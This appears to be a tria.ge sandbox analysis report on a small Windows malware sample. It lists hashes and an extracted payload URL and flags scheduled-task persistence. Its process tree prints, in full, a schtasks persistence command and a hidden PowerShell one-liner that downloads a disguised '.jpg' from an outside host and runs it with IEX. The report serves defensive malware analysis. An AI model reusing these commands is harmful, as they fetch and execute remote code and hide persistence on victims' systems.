Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
48s -
max time network
80s -
platform
windows10-2004_x64 -
resource
win10v2004-20230703-en -
resource tags
arch:x64arch:x86image:win10v2004-20230703-enlocale:en-usos:windows10-2004-x64system -
submitted
07/08/2023, 12:23
Static task
static1
Behavioral task
behavioral1
Sample
feaf57c2993c580aa9d23610268ca0d88a7ca2f2294e54e11d95efb50a0858bc.exe
Resource
win7-20230712-en
Behavioral task
behavioral2
Sample
feaf57c2993c580aa9d23610268ca0d88a7ca2f2294e54e11d95efb50a0858bc.exe
Resource
win10v2004-20230703-en
General
-
Target
feaf57c2993c580aa9d23610268ca0d88a7ca2f2294e54e11d95efb50a0858bc.exe
-
Size
6KB
-
MD5
77421b1f90fc1e9247f693e857e8c429
-
SHA1
63c26635980d5a185a24d1be79c877a1e8507133
-
SHA256
feaf57c2993c580aa9d23610268ca0d88a7ca2f2294e54e11d95efb50a0858bc
-
SHA512
0bb90e930e0856504631a95792175a149b8565a9acbfdbe68a74e13573e00f1eb433b3c73439523e670b3b66559619c3c85efce9881544f0381afc88e3e8b095
-
SSDEEP
96:1jYUzP8hRH7AKjC2LcS14bqxqsmthY2VxEzNt:Fz8hRb1CNSGJsmjYSu
Malware Config
Extracted
https://a.top4top.net/p_814sg63b2.jpg
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4836 schtasks.exe -
Suspicious use of WriteProcessMemory 2 IoCs
description pid Process procid_target PID 2968 wrote to memory of 4836 2968 feaf57c2993c580aa9d23610268ca0d88a7ca2f2294e54e11d95efb50a0858bc.exe 81 PID 2968 wrote to memory of 4836 2968 feaf57c2993c580aa9d23610268ca0d88a7ca2f2294e54e11d95efb50a0858bc.exe 81
Processes
-
C:\Users\Admin\AppData\Local\Temp\feaf57c2993c580aa9d23610268ca0d88a7ca2f2294e54e11d95efb50a0858bc.exe"C:\Users\Admin\AppData\Local\Temp\feaf57c2993c580aa9d23610268ca0d88a7ca2f2294e54e11d95efb50a0858bc.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2968 -
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /sc minute /mo 1 /tn "Update" /tr "C:\Users\Admin\AppData\Local\Temp\Microsoft32.vbs"2⤵
- Creates scheduled task(s)
PID:4836
-
-
C:\Windows\System32\WScript.exeC:\Windows\System32\WScript.exe "C:\Users\Admin\AppData\Local\Temp\Microsoft32.vbs"1⤵PID:2136
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -command [System.Net.WebClient]$webClient = New-Object System.Net.WebClient;[System.IO.Stream]$stream = $webClient.OpenRead('https://a.top4top.net/p_814sg63b2.jpg');[System.IO.StreamReader]$sr = New-Object System.IO.StreamReader -argumentList $stream;[string]$results = $sr.ReadToEnd();IEX $results; hackbacktrack2⤵PID:4296
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -command [System.Net.WebClient]$webClient = New-Object System.Net.WebClient;[System.IO.Stream]$stream = $webClient.OpenRead('https://a.top4top.net/p_814sg63b2.jpg');[System.IO.StreamReader]$sr = New-Object System.IO.StreamReader -argumentList $stream;[string]$results = $sr.ReadToEnd();IEX $results; hackbacktrack3⤵PID:4572
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
537B
MD544476af998bf0a5714e3ab100f022a1e
SHA1bf26b1f4227b8bfc27d4a7cb2a1cdd4ad224d08e
SHA256ef4eae75f800b98fb7c189bd92ba4a1db6d1cc665791634d5ec3c3fe535c1ec2
SHA512e02c3d2590f478deafaf3f20c421951c26ccf966817a7299fe2a4ede856190960f1853a4a2907d28f2ff24a357e9d0c039a69d1ee5f53e5c9ffde428d911bd99